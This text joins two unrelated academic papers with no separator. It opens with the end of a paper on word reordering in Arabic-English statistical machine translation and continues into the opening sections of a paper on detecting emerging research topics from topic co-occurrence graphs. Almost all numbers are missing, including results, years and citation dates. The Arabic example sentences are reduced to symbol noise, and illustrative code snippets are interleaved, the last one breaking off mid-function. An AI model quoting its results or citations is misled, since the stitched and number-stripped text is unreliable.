quality. here too, relaxing the dl without special pruning hurts not only efficiency but also translation qual- ity: all the scores decrease considerably, showing that even the stronger lm is not sufficient to guide search through a very large reordering search space. 
as for our enhanced system, it achieves simi- lar gains as in the medium-scale scenario: that is, bleu and meteor are preserved or slightly im- proved despite the very high dl, while all the re- ordering scores increase. in particular, we report sta- tistically significant improvements in the reordering of verbs, which is where the impact of our method is expected to concentrate (+ . , + . and + . krs-v on eval -nw, eval -nw and vs- , respectively). these results confirm the usefulness of our method not only as an optimization technique, but also as a way to improve translation quality on top of a very strong baseline. src ! ! ! "#$!% &'( )* +, -. / $%&' &- ! + + * + ( ! + #+ ! : &- *; < ( &- ! ( &-=>?@a( b* +cd ef( * verb subj. obj. compl. ywasl sfyr almmlkp alerbyp alsewdyp ldy lbnan ebdalezyz xwjp thrk -h fy atjah ... continues ambassador kingdom arabian saudi to lebanon abdulaziz khawja move his in direction ref the kingdom of saudi arabia ’s ambassador to lebanon abdulaziz khawja continues his moves towards ... base continue to saudi arabian ambassador to lebanon , abdulaziz khwja its move in the direction of ... new the kingdom of saudi arabia ’s ambassador to lebanon , abdulaziz khwja continue its move in the direction of ... src ;# *$g'( h( + &b ( )i( e j<k # +l m#nl &-o p )*qr# *< ( s! & =@a( tu*v w xy. # ; #? * +, adv. verb obj. subj. compl. fyma dea -hm r}ys almktb alsyasy l- hrkp hmas xald m$el aly altzam alhyad meanwhile called them head bureau political of movement hamas khaled mashal to necessity neutrality ref meanwhile, the head of the political bureau of the hamas movement, khaled mashal, called upon them to remain neutral base the called them, head of hamas’ political bureau, khalid mashal, to remain neutral new the head of hamas’ political bureau, khalid mashal, called on them to remain neutral figure : long reordering examples showing improvements over the baseline system (base) when the dl is raised to and early pruning based on waw reordering scores is enabled (new). long jumps statistics and examples. to better understand the behavior of the early-pruning system, we extract phrase-to-phrase jump statistics from the decoder log file. we find that jumps beyond the non-prunable zone (d> ) were performed to trans- late the sentences of eval -nw; out of these were longer than and mostly concentrated on the vs- sentence subset ( jumps d> performed in vs- ). this and the higher reordering scores sug- gest that long jumps are mainly carried out to cor- rectly reorder clause-inital verbs over long subjects. fig. shows two arabic sentences taken from eval -nw, that were erroneuously reordered by the baseline system. the system including the waw model and early reordering pruning, instead, pro- duced the correct translation. the first sentence is a typical example of vso order with a long subject: while the baseline system left the verb in its ara- bic position, producing an incomprehensible trans- lation, the new system placed it rightly between the english subject and object. this reordering involved two long jumps: one with d= backward and one with d= forward. the second sentence displays another, less com- mon, arabic construction: namely vos, with a per- sonal pronoun object. in this case, a backward jump with d= and a forward jump with d= were nec- essary to achieve the correct reordering. statistics computed on the medium-lm system. 
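the phrase-to-phrase jump statistics mentioned above can be recomputed from the order in which the decoder covers input positions. the sketch below assumes that this order has already been parsed from the decoder trace (whose exact format is not shown here) and counts jumps above illustrative distortion thresholds; the actual thresholds used in the paper are not reproduced.

def jump_statistics(coverage_orders, thresholds=(5, 10)):
    # coverage_orders: one list per sentence, giving the order in which
    # input positions were covered by the decoder.
    counts = {th: 0 for th in thresholds}
    for order in coverage_orders:
        for prev, cur in zip(order, order[1:]):
            distortion = abs(cur - prev - 1)
            for th in thresholds:
                if distortion > th:
                    counts[th] += 1
    return counts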
conclusions we have trained a discriminative model to predict likely reordering steps in a way that is complemen- tary to state-of-the-art psmt reordering models. we have effectively integrated it into a psmt decoder as additional feature, ensuring that its total score over a complete translation hypothesis is consistent across different phrase segmentations. lastly, we have pro- posed early reordering pruning as a novel method to dynamically shape the input reordering space and capture long-range reordering phenomena that are often critical when translating between languages with different syntactic structures. evaluated on a popular arabic-english news translation task against a strong baseline, our ap- proach leads to similar or even higher bleu, me- teor and krs scores at a very high distortion limit ( ), which is by itself an important achievement. at the same time, the reordering of verbs, measured with a novel version of the krs, is consistently im- proved, while decoding gets significantly faster. the improvements are also confirmed when a very large lm is used and the decoder’s beam size is dou- bled, which shows that our method reduces not only search errors but also model errors even when base- line models are very strong. word reordering is probably the most difficult as- pect of smt and an important factor of both its qual- ity and efficiency. given its strong interaction with the other aspects of smt, it appears natural to solve word reordering during decoding, rather than before or after it. to date, however, this objective was only partially achieved. we believe there is a promising way to go between fully-integrated reordering mod- els and monolingual pre-ordering methods. this work has started to explore it. aknowledgments this work was partially funded by the european union fp grant agreement (eu-bridge). references yaser al-onaizan and kishore papineni. . distor- tion models for statistical machine translation. in pro- ceedings of the st international conference on com- putational linguistics and th annual meeting of the association for computational linguistics, pages – , sydney, australia, july. jacob andreas, nizar habash, and owen rambow. . fuzzy syntactic reordering for phrase-based statistical machine translation. in proceedings of the sixth work- shop on statistical machine translation, pages – , edinburgh, scotland, july. satanjeev banerjee and alon lavie. . meteor: an automatic metric for mt evaluation with improved correlation with human judgments. in proceedings of the acl workshop on intrinsic and extrinsic evalu- ation measures for machine translation and/or sum- marization, pages – , ann arbor, michigan, june. a. l. berger, p. f. brown, s. a. della pietra, v. j. della pietra, j. r. gillett, a. s. kehler, and r. l. mercer. . language translation apparatus and method of using context-based translation models. united states patent, no. , apr. alexandra birch, phil blunsom, and miles osborne. . a quantitative analysis of reordering phenom- ena. in statmt ’ : proceedings of the fourth work- shop on statistical machine translation, pages – , morristown, nj, usa. alexandra birch, miles osborne, and phil blunsom. . metrics for mt evaluation: evaluating reorder- ing. machine translation, ( ): – . arianna bisazza and marcello federico. . modi- fied distortion matrices for phrase-based statistical ma- chine translation. 
in proceedings of the th annual meeting of the association for computational linguis- tics (volume : long papers), pages – , jeju is- land, korea, july. arianna bisazza, daniele pighin, and marcello fed- erico. . chunk-lattices for verb reordering in arabic-english statistical machine translation. ma- chine translation, special issue on mt for arabic, ( - ): – . arianna bisazza. . linguistically motivated re- ordering modeling for phrase-based statistical ma- chine translation. ph.d. thesis, university of trento. http://eprints-phd.biblio.unitn.it/ /. marine carpuat, yuval marton, and nizar habash. . improved arabic-to-english statistical machine trans- lation by reordering post-verbal subjects for word alignment. machine translation, special issue on mt for arabic, ( - ): – . mauro cettolo, nicola bertoldi, and marcello federico. . methods for smoothing the optimizer instability in smt. in mt summit xiii: the thirteenth machine translation summit, pages – , xiamen, china. stanley f. chen and joshua goodman. . an empiri- cal study of smoothing techniques for language model- ing. computer speech and language, ( ): – . marta r. costa-jussà and josé a. r. fonollosa. . state-of-the-art word reordering approaches in statisti- cal machine translation: a survey. ieice transac- tions on information and systems, e -d( ): – . koby crammer and yoram singer. . ultraconser- vative online algorithms for multiclass problems. j. mach. learn. res., : – , march. hal daumé iii. . notes on cg and lm-bfgs op- timization of logistic regression. paper available at http://pub.hal .name, implementation avail- able at http://hal .name/megam. mona diab, kadri hacioglu, and daniel jurafsky. . automatic tagging of arabic text: from raw text to base phrase chunks. in daniel marcu susan dumais and salim roukos, editors, hlt-naacl : short papers, pages – , boston, massachusetts, usa. marcello federico, nicola bertoldi, and mauro cettolo. . irstlm: an open source toolkit for handling large scale language models. in proceedings of in- terspeech, pages – , melbourne, australia. minwei feng, arne mauser, and hermann ney. . a source-side decoding sequence model for statisti- cal machine translation. in conference of the associa- tion for machine translation in the americas (amta), denver, colorado, usa. michel galley and christopher d. manning. . a simple and effective hierarchical phrase reordering model. in emnlp ’ : proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , morristown, nj, usa. spence green, conal sathi, and christopher d. man- ning. . np subject detection in verb-initial ara- bic clauses. in proceedings of the third workshop on computational approaches to arabic script-based languages (caasl ), ottawa, canada. spence green, michel galley, and christopher d. man- ning. . improved models of distortion cost for statistical machine translation. in human language technologies: the annual conference of the north american chapter of the association for com- putational linguistics (naacl), pages – , los angeles, california. magnus r. hestenes and eduard stiefel. . meth- ods of conjugate gradients for solving linear systems. journal of research of the national bureau of stan- dards, ( ): – . h. johnson, j. martin, g. foster, and r. kuhn. . im- proving translation quality by discarding most of the phrasetable. in in proceedings of emnlp-conll , pages – . philipp koehn, franz josef och, and daniel marcu. . statistical phrase-based translation. 
in proceed- ings of hlt-naacl , pages – , edmonton, canada. philipp koehn, amittai axelrod, alexandra birch mayne, chris callison-burch, miles osborne, and david talbot. . edinburgh system description for the iwslt speech translation evaluation. in proc. of the international workshop on spoken lan- guage translation, october. p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran, r. zens, c. dyer, o. bojar, a. constantin, and e. herbst. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meeting of the association for com- putational linguistics companion volume proceed- ings of the demo and poster sessions, pages – , prague, czech republic. ravi kumar and sergei vassilvitskii. . general- ized distances between rankings. in proceedings of the th international conference on world wide web, pages – , new york, ny, usa. acm. percy liang, ben taskar, and dan klein. . align- ment by agreement. in proceedings of the human language technology conference of the naacl, main conference, pages – , new york city, usa, june. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajič. . non-projective dependency parsing using spanning tree algorithms. in proceedings of the conference on human language technology and em- pirical methods in natural language processing, hlt ’ , pages – , stroudsburg, pa, usa. robert c. moore and chris quirk. . faster beam- search decoding for phrasal statistical machine transla- tion. in in proceedings of mt summit xi, pages – , copenhagen, denmark. f. och and h. ney. . discriminative training and maximum entropy models for statistical machine translation. in proceedings of the th annual meet- ing of the association for computational linguistics (acl), pages – , philadelhpia, pa. franz josef och. . minimum error rate training in statistical machine translation. in erhard hinrichs and dan roth, editors, proceedings of the st annual meeting of the association for computational linguis- tics, pages – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in proceedings of the th annual meeting of the association of compu- tational linguistics (acl), pages – , philadel- phia, pa. stefan riezler and john t. maxwell. . on some pitfalls in automatic evaluation and significance test- ing for mt. in proceedings of the acl workshop on intrinsic and extrinsic evaluation measures for ma- chine translation and/or summarization, pages – , ann arbor, michigan, june. christoph tillmann. . a unigram orientation model for statistical machine translation. in pro- ceedings of the joint conference on human language technologies and the annual meeting of the north american chapter of the association of computa- tional linguistics (hlt-naacl). karthik visweswariah, rajakrishnan rajkumar, ankur gandhe, ananthakrishnan ramanathan, and jiri navratil. . a word reordering model for im- proved machine translation. in proceedings of the conference on empirical methods in natu- ral language processing, pages – , edinburgh, scotland, uk., july. dekai wu. . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, ( ): – . sirvan yahyaei and christof monz. . dynamic dis- tortion in a discriminative reordering model for sta- tistical machine translation. in international work- shop on spoken language translation (iwslt), paris, france. richard zens and hermann ney. . 
discriminative reordering models for statistical machine translation. in proceedings on the workshop on statistical ma- chine translation, pages – , new york city, june. r. zens, f. j. och, and h. ney. . phrase-based sta- tistical machine translation. in th german confer- ence on artificial intelligence (ki ), pages – , aachen, germany. springer verlag. submitted july accepted may published june corresponding author angelo a. salatino, angelo.salatino@open.ac.uk academic editor filippo menczer additional information and declarations can be found on page doi . /peerj-cs. copyright salatino et al. distributed under creative commons cc-by . open access how are topics born? understanding the research dynamics preceding the emergence of new areas angelo a. salatino, francesco osborne and enrico motta knowledge media institute, the open university, milton keynes, united kingdom abstract the ability to promptly recognise new research trends is strategic for many stake- holders, including universities, institutional funding bodies, academic publishers and companies. while the literature describes several approaches which aim to identify the emergence of new research topics early in their lifecycle, these rely on the assumption that the topic in question is already associated with a number of publications and consistently referred to by a community of researchers. hence, detecting the emergence of a new research area at an embryonic stage, i.e., before the topic has been consistently labelled by a community of researchers and associated with a number of publications, is still an open challenge. in this paper, we begin to address this challenge by performing a study of the dynamics preceding the creation of new topics. this study indicates that the emergence of a new topic is anticipated by a significant increase in the pace of collaboration between relevant research areas, which can be seen as the ‘parents’ of the new topic. these initial findings (i) confirm our hypothesis that it is possible in principle to detect the emergence of a new topic at the embryonic stage, (ii) provide new empirical evidence supporting relevant theories in philosophy of science, and also (iii) suggest that new topics tend to emerge in an environment in which weakly interconnected research areas begin to cross-fertilise. subjects artificial intelligence, data science, digital libraries keywords scholarly data, topic emergence detection, empirical study, research trend detection, topic discovery, digital libraries introduction early awareness of the emergence of new research topics can bring significant benefits to anybody involved in the research environment. academic publishers and editors can exploit this knowledge and offer the most up to date and interesting contents. researchers may not only be interested in new trends related to their areas but may also find it very useful to be alerted about significant new research developments in general. institutional funding bodies and companies also need to be regularly updated on how the research landscape is evolving, so that they can make early decisions about critical investments. considering the growth rate of research publications (larsen & von ins, ), keeping up with novel trends is a challenge even for expert researchers. traditional methods, such as the manual exploration of publications in significant conferences and journals, are no longer viable. 
this has led to the emergence of several approaches capable of detecting novel topics and how to cite this article salatino et al. ( ), how are topics born? understanding the research dynamics preceding the emergence of new areas. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:angelo.salatino@open.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. research trends (bolelli, ertekin & giles, ; duvvuru, kamarthi & sultornsanee, ; he et al., ; wu, venkatramanan & chiu, ). however, all of these approaches focus on topics that are already associated with a number of publications and consistently referred to by a community of researchers. this limitation hinders the ability of stakeholders to anticipate and react promptly to new developments in the research landscape. hence, there is a need for novel methods capable of identifying the appearance of new topics at a very early stage, assessing their potential and forecasting their trajectory. to this end, we need first to achieve a better understanding of the dynamics underlying the creation of new topics and then investigate whether such understanding can be exploited to develop computationally effective methods, which are capable of detecting the emergence of new topics at a very early stage. the field of philosophy of science offers a number of interesting theories about the emergence of new topics kuhn ( ) theorised that science evolves through paradigm shifts. according to him, scientific work is performed within a set of paradigms and when these paradigms cannot cope with certain problems, there is a paradigm shift that can lead to the emergence of a new scientific discipline. this happens often through the creation of novel scientific collaborations. in this context, becher & trowler ( ) explained that, even if science proceeds towards more specific disciplines, and thus researchers in different communities become less compatible, they are still inclined to collaborate for mutual benefit. herrera, roberts & gulbahce ( ), sun et al. ( ) and nowotny, scott & gibbons ( ) suggested that the development of new topics is encouraged by the cross- fertilisation of established research areas and recognised that multidisciplinary approaches foster new developments and innovative thinking. sun et al. ( ) and osborne, scavo & motta ( ) provided empirical evidence to these theories by analysing the social dynamics of researchers and their effects on the formation and life-cycle of research communities and topics. according to these theories, when a new scientific area emerges, it goes through two main phases. in the initial phase a group of scientists agree on some basic tenets, build a conceptual framework and begin to establish a new scientific community. afterwards, the area enters a recognised phase, in which a substantial number of authors become active in the area, producing and disseminating results (couvalis, ). 
inspired by these theories, we hypothesize the existence of an even earlier phase, which we name embryonic phase, in which a topic has not yet been explicitly labelled and recognized by a research community, but it is already taking shape, as evidenced by the fact that researchers from a variety of fields are forming new collaborations and producing new work, starting to define the challenges and the paradigms associated with the emerging new area. we also hypothesize that it could be possible to detect topics at this stage by analysing the dynamics of already established topics. in this context, we use the term dynamics to refer to the significant trends associated with a topic, including the interactions between topics and those between entities linked to these topics, such as publications, authors, venues. for example, the sudden appearance of some publications concerning a combination of previously uncorrelated topics may suggest that some pioneer researchers are investigating salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. new possibilities and maybe shaping a new emerging area. in the same way, as pointed out by salatino ( ), we can hypothesize a wide array of relevant patterns of activity, which could anticipate the creation of a new research area. these may include a new collaboration between two or more research communities (osborne, scavo & motta, ), the creation of interdisciplinary workshops, a rise in the number of experts working on a certain combination of topics, a significant change in the vocabulary associated with relevant topics (cano basave, osborne & salatino, ), and so on. in this paper we present a study that aims to uncover key elements associated with the research dynamics preceding the creation of novel topics, thus providing initial evidence to support our hypotheses. in particular, our study provides evidence that the emergence of a novel research topic can be anticipated by a significant increase in the pace of collaboration between relevant research areas, which can be seen as the ‘parents’ of the new topic. our study was performed on a sample of three million publications in the – interval. it was conducted by comparing the sections of the co-occurrence graphs where new topics are about to emerge with a control group of subgraphs associated with established topics. these graphs were analysed by using two novel approaches that integrate both statistics and semantics. we found that the pace of collaboration and the density measured in the sections of the network that will give rise to a new topic are significantly higher than those in the control group. these findings support our hypothesis about the existence of an embryonic phase and also yield new empirical evidence consistent with the aforementioned theories in philosophy of science. in addition, the identified dynamics could be used as the starting point for developing new automatic methods, which could detect the emergence of a new research topic well before this becomes explicitly recognised and established. the study presented in this paper is an extension of the work by salatino & motta ( ). 
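as an illustration of the kind of comparison carried out in this study, the sketch below contrasts a measurement (for example, subgraph density) taken on the portions of the topic network that later give rise to a new topic with the same measurement taken on control subgraphs. the mann-whitney u test is used here only as an example of a two-sample comparison; the paper's own statistical procedure is the one described in its methods section.

from scipy.stats import mannwhitneyu

def compare_groups(debutant_values, control_values):
    # debutant_values / control_values: e.g. densities (or pace-of-collaboration
    # measurements) of subgraphs surrounding soon-to-emerge topics vs. subgraphs
    # surrounding established (control) topics.
    stat, p_value = mannwhitneyu(debutant_values, control_values,
                                 alternative="greater")
    return stat, p_value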
the new contributions of this paper are: ( ) a larger sample including debutant topics and established ones, ( ) a new technique for measuring the density of the topic graph, ( ) a more exhaustive statistical analysis, including a comparison of the different approaches, ( ) a revised state of the art, and ( ) a more comprehensive discussion of the findings. the rest of the paper is organized as follows. we first review the literature regarding the early detection of topics, pointing out the existing gaps. we then describe the experimental approach used for the study, present the results and discuss their implications. finally, we summarize the main conclusions and outline future directions of research. related work topic detection and tracking is a task that has drawn much attention in recent years and has been applied to a variety of scenarios, such as social networks (cataldi, di caro & schifanella, ; mathioudakis & koudas, ), blogs (gruhl et al., ; oka, abe & kato, ), emails (morinaga & yamanishi, ) and scientific literature (bolelli, ertekin & giles, ; decker et al., ; erten et al., ; lv et al., ; osborne, scavo & motta, ; sun, ding & lin, ; tseng et al., ). the literature presents several works on research trend detection, which can be characterised either by the way they define a topic or the techniques they use detect it salatino et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (salatino ( ). blei, ng & jordan, ( ) have developed the well-known latent dirichlet allocation (lda), an unsupervised learning method to extract topics from a corpus, which models topics as a multinomial distribution over words. since its introduction, lda has been extended and adapted to several applications. for example, blei & lafferty ( ) have introduced the correlated topic model using the logistic normal distribution instead of the dirichlet one, to address the issue that lda fails to model correlations between topics. griffiths et al. ( ) have developed the hierarchical lda, where topics are grouped together in a hierarchy. further extensions incorporate other kinds of research metadata. for example, rosen-zvi et al. ( ) present the author-topic model (atm), which includes authorship information and associates each topic to a multinomial distribution over words and each author to a multinomial distribution over topics. bolelli, ertekin & giles ( ) introduce the segmented author-topic model which extends atm by adding the temporal ordering of documents to address the problem of topic evolution. in addition, chang & blei ( ) have developed the relational topic model which combines lda and the network structure of documents to model topics. similarly, he et al. ( ) have combined lda and citation networks in order to address the problem of topic evolution. their approach detects topics in independent subsets of a corpus and leverages citations to connect topics in different time frames. in a similar way, morinaga & yamanishi ( ) employ a probabilistic model called finite mixture model to represent the structure of topics and analyse the changes in time of the extracted components to track emerging topics. however, their evaluation rests on an email corpus, thus it is not clear how it would perform on scientific corpus. a general issue affecting this kind of approaches is that it is not always easy to associate clearly identifiable research areas to the resulting topic models. 
in addition to lda, the natural language processing (nlp) community has proposed a variety of tools for identifying topics. for example, chavalarias & cointet ( ) used cortext manager to extract a list of n-grams representing the most salient terms from a corpus and derived a co-occurrence matrix on which they performed clustering analysis to discover patterns in the evolution of science. jo, lagoze & giles ( ) developed an approach that correlates the distribution of terms extracted from a text with the distribution of the citation graphs related to publications containing these terms. their work assumes that if a term is relevant to a topic, documents containing that term will have a stronger connection than randomly selected ones. this approach is not suitable for topics in their very early stage, since it takes time for the citation network of a term to become tightly connected. duvvuru et al. ( ) analysed the network of co-occurring keywords in a scholarly corpus and monitored the evolution in time of the link weights, to detect research trends and emerging research areas. however, as osborne & motta ( ) pointed out, keywords tend to be noisy and do not always represent research topics; in many cases different keywords even refer to the same topic. for example, osborne, scavo & motta ( ) showed that a semantic characterisation of research topics yields better results than keywords for the detection of research communities. to cope with this problem, some approaches rely on taxonomies of topics. for example, decker et al. ( ) matched a corpus of research papers to a taxonomy of topics based on the most significant words found in titles and abstracts, and analysed the changes in the number of publications associated with such topics. similarly, erten et al. ( ) adopted the acm digital library taxonomy for analysing the evolution of topic graphs and monitoring research trends. however, human-crafted taxonomies tend to evolve slowly and, in a fast-changing research field such as computer science (pham, klamma & jarke, ), it is important to rely on constantly updated taxonomies. for this reason, in our experiment we adopted an ontology of computer science automatically generated and regularly updated by the klink-2 algorithm developed by osborne & motta ( ). in brief, the literature comprises a wide collection of approaches for detecting research trends. however, they focus on already recognised topics, which are either already associated with a recognized label or, in the case of probabilistic topic models, with a set of terms that have previously appeared in a good number of publications. detecting research trends at an embryonic stage remains an open challenge.

materials and methods
the aim of this study was to measure the association between the emergence of a new topic and the increase of the pace of collaboration and density previously observed in the co-occurrence graphs of related topics. to this end, we represent topics and their relationships in a certain time frame as a graph in which nodes are topics and edges represent their co-occurrences in a sample of publications. this is a common representation for investigating topic dynamics (boyack, klavans & börner, ; leydesdorff, ; newman, ). in the following we will refer to it as the topic graph or topic network. we analysed topics that debuted in the – period using established topics as a control group.
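to make this representation concrete, here is a minimal sketch (an assumed implementation, not the authors' code) of how a yearly topic co-occurrence graph of this kind could be assembled with networkx; the toy records and field names are hypothetical, and the weighting (node weight counts publications mentioning a topic, edge weight counts co-occurring publications) follows the construction described in the following sections.

```python
# minimal sketch: building a yearly topic co-occurrence graph (illustrative only)
from itertools import combinations
import networkx as nx

# hypothetical publication records: (year, list of topics attached to the paper)
papers = [
    (2004, ["world wide web", "information retrieval", "search engines"]),
    (2004, ["world wide web", "artificial intelligence"]),
    (2005, ["grid computing", "web services", "distributed computer systems"]),
]

def topic_graph(papers, year):
    """nodes are topics seen in `year`; node and edge weights count publications."""
    g = nx.Graph()
    for y, topics in papers:
        if y != year:
            continue
        for t in set(topics):
            if t in g:
                g.nodes[t]["weight"] += 1
            else:
                g.add_node(t, weight=1)
        for a, b in combinations(sorted(set(topics)), 2):
            if g.has_edge(a, b):
                g[a][b]["weight"] += 1
            else:
                g.add_edge(a, b, weight=1)
    return g

g2004 = topic_graph(papers, 2004)
print(list(g2004.edges(data=True)))
```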
in our previous work (salatino & motta, ), we conducted a similar analysis on a smaller sample. the sample analysed in this paper was selected by iteratively adding new topics until we reached data saturation (fusch & ness, ), i.e., the results of the analysis did not vary significantly with the inclusion of new data points. in the following sections, we will describe the dataset, the semantically enhanced topic graph, and the methods used to measure the pace of collaboration and the density of the subgraphs. the raw data and the results of this study are available at https://osf.io/bd ex/.

semantic enhanced topic network
we use as dataset the metadata describing three million papers in the field of computer science from a dump of the well-known scopus dataset (https://www.elsevier.com/solutions/scopus). in this dataset each paper is associated with a number of keywords that can be used to build the topic graph. however, as pointed out in osborne & motta ( ), the use of keywords as proxies for topics suffers from a number of problems: some keywords do not represent topics (e.g., case study) and multiple keywords can refer to the same topic (e.g., ontology mapping and ontology matching). the literature offers several methods for characterizing research topics. probabilistic topic models, such as lda, are very popular solutions, which however are most effective in scenarios where fuzzy classification is acceptable, there is no good domain knowledge, and it is not important for users to understand the rationale of a classification. however, these tenets do not apply to this study. furthermore, it is not easy to label the topics produced by a probabilistic topic model with specific and distinct research areas. conversely, in this study it is important to be able to associate topics with well-established research areas. a second approach, used by several digital libraries and publishers, is tagging publications with categories from a pre-determined taxonomy of topics. some examples include the acm computing classification system (http://www.acm.org/publications/class- ), the springer nature classification (http://www.nature.com/subjects), scopus subject areas (https://www.elsevier.com/solutions/scopus/content), and the microsoft academic search classification (http://academic.research.microsoft.com/). this solution has the advantage of producing sound topics, agreed upon by a committee of experts. however, these taxonomies suffer from a number of issues. first, building large-scale taxonomies requires a sizable number of experts and it is an expensive and time-consuming process. hence, they are seldom updated and grow obsolete very quickly. for example, the 2012 version of the acm classification was finalized fourteen years after the previous version. in addition, these taxonomies are very coarse-grained and usually contain general fields rather than fine-grained research topics. we addressed these issues by characterizing our topics according to the computer science ontology (cso) produced by klink-2 (osborne & motta, ), which describes the relationships between more than , research areas extracted from a corpus of million publications.
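as a purely illustrative sketch of the keyword clean-up this implies (the mapping table and function below are hypothetical and are not the cso or klink-2 api), raw keywords can be normalised by dropping non-topic terms and merging keywords declared equivalent by the ontology before the graph is built.

```python
# minimal sketch: merging equivalent keywords into a single topic (illustrative only)

# hypothetical excerpt of relatedEquivalent links taken from an ontology such as the cso
EQUIVALENT = {
    "semantic web technology": "semantic web",
    "semantic web technologies": "semantic web",
    "ontology matching": "ontology mapping",
}
NON_TOPICS = {"case study", "survey"}  # keywords that do not denote research areas

def normalise(keywords):
    """map raw paper keywords to canonical topics, dropping non-topic terms."""
    topics = set()
    for kw in keywords:
        kw = kw.strip().lower()
        if kw in NON_TOPICS:
            continue
        topics.add(EQUIVALENT.get(kw, kw))
    return sorted(topics)

print(normalise(["Semantic Web Technologies", "case study", "ontology matching"]))
# -> ['ontology mapping', 'semantic web']
```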
klink-2 is an algorithm that is able to generate very granular ontologies and update them regularly by analysing keywords and their relationships with research papers, authors, venues, and organizations, and by taking advantage of multiple knowledge sources available on the web. klink-2 is currently integrated in the rexplore system (osborne, motta & mulholland, ), a platform for exploring and making sense of scholarly data, which provides semantic-aware analytics. we used the cso ontology to semantically enhance the co-occurrence graphs by removing all keywords that did not refer to research areas and by aggregating keywords representing the same concept, i.e., keywords linked by a relatedequivalent relationship in the ontology (osborne, motta & mulholland, ). for example, we aggregated keywords such as "semantic web", "semantic web technology" and "semantic web technologies" into a single semantic topic and we assigned it to all publications associated with these keywords. we built sixteen topic networks representing topic co-occurrences in the – timeframe. each network is a fully weighted graph $G_{year} = (V_{year}, E_{year})$, in which $V_{year}$ is the set of topics while $E_{year}$ is the set of links representing the topic co-occurrences. the node weight represents the number of publications in which a topic appears in a year, while the link weight is equal to the number of publications in which two topics co-occur in the same year.

graph selection
we randomly selected topics that debuted in the period between and as the treatment group (also referred to as the debutant group). a topic debuts in the year in which its label first appears in a research paper. the control group (also referred to as the non-debutant group) was obtained by selecting well-established topics. we considered a topic as well-established if: (i) it debuted before , (ii) it appears in the cso ontology, and (iii) it is associated each year with a substantial and consistent number of publications. as an example, fig. shows the evolution through time of the well-established topic software agents, in terms of number of active authors and publications. the figure shows that the topic made its debut in and in the year reached a rate of over publications per year with more than , authors working on it. it can thus be considered established in the context of our study.
figure: evolution of the topic software agents in terms of number of authors and number of publications per year. the chart has been produced using the rexplore system.
figure: workflow representing all the steps of the selection phase.
we assume that a new topic will continue to collaborate with the topics that contributed to its creation for a certain time after its debut. this assumption was discussed and tested in a previous study (osborne & motta, ), where it was used to find historical subsumption links between research areas. hence, as summarized in fig. , for each debutant topic we
extracted the portion of the topic network containing its n most co-occurring topics from the year of debut until nowadays and analysed their activity in the five years preceding the year of debut. since we want to analyse how the dimension of these subgraphs influences the results, we tested different values of n ( , , and ). for example, if a topic a made its debut in , the portion of the network containing its most co-occurring topics is analysed in the – timeframe. we repeated the same procedure on the topics in the control group, assigning them a random year of analysis within the decade – . in the previous study (salatino & motta, ), we selected established topics and assigned a random year of analysis to each of them. for this study, we randomly assigned each established topic to two consecutive years within the decade – , with the consequence of doubling the control group, thus reducing noise and smoothing the resulting measures. in brief, the selection phase associates to each topic in the treatment and control groups (also referred to as input topics) a graph:

$G^{topic} = G^{topic}_{year-1} \cup G^{topic}_{year-2} \cup G^{topic}_{year-3} \cup G^{topic}_{year-4} \cup G^{topic}_{year-5}$. ( )

this graph corresponds to the co-occurrence network of a debutant topic in the five years prior to its emergence (or prior to the year of analysis for non-debutant topics). in particular, each year corresponds to the sub-graph:

$G^{topic}_{year-i} = (V^{topic}_{year-i}, E^{topic}_{year-i})$ ( )

in which $V^{topic}_{year-i}$ is the set of most co-occurring topics in a year and $E^{topic}_{year-i}$ is the set of edges linking the nodes in the set. the graphs associated to the debutant topics included , unique topics, while the ones associated to the control group included , topics.

graph analysis
we assess the dynamics in the graphs with two main approaches: clique-based and triad-based. the first transforms the graph into 3-cliques, associates to each of them a measure reflecting the increase in collaboration between relevant topics and then averages the results over all 3-cliques. the second measures the increase in the topic graph density using the triad census technique (davis & leinhardt, ). in the following two sections we describe both methods in detail.

clique-based method
we measure the collaboration pace of a graph by analysing the diachronic activity of triangles of collaborating topics. to this end, we first extract all 3-cliques from the five sub-graphs associated to each topic under analysis. a 3-clique, as shown in fig. , is a complete sub-graph of order three in which all nodes are connected to one another and is employed for modelling small groups of entities close to each other (luce & perry, ). to study the dynamics preceding the debut of each topic, we analyse the evolution of the same 3-clique in subsequent years. figure summarizes the process.
figure: an instance of a 3-clique with node weights {w_a, w_b, w_c} and link weights {w_ab, w_bc, w_ca}.
figure: main steps of the analysis phase.
considering a 3-clique having nodes {a, b, c}, we quantify its collaboration index µ in a year by taking into account both node weights {w_a, w_b, w_c} and link weights {w_ab, w_bc, w_ca}:

µ_{a-b} = mean(P(a|b), P(b|a))
µ_{b-c} = mean(P(b|c), P(c|b))
µ_{c-a} = mean(P(c|a), P(a|c))
µ = mean(µ_{a-b}, µ_{b-c}, µ_{c-a}). ( )

the index µ is computed by aggregating the three coefficients µ_{a-b}, µ_{b-c} and µ_{c-a}, as illustrated by eq. ( ). the strength of collaboration µ_{x-y} between two nodes of the topic network, x and y, is computed as the mean of the conditional probabilities P(y|x) and P(x|y), where P(y|x) is the probability that a publication associated with a topic x will be associated also with a topic y in a certain year.
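a minimal, purely illustrative sketch of this computation is given below (an assumed implementation, not the authors' code); it assumes that per-year topic publication counts and co-occurrence counts are available as dictionaries, and estimates P(y|x) as the fraction of publications of topic x that also mention y.

```python
# minimal sketch: collaboration index of a 3-clique in one year (illustrative only)
from itertools import combinations

# hypothetical per-year statistics
node_weight = {"world wide web": 1200, "information retrieval": 800, "search engines": 300}
link_weight = {  # number of publications in which two topics co-occur
    ("world wide web", "information retrieval"): 90,
    ("world wide web", "search engines"): 60,
    ("information retrieval", "search engines"): 45,
}

def cooc(x, y):
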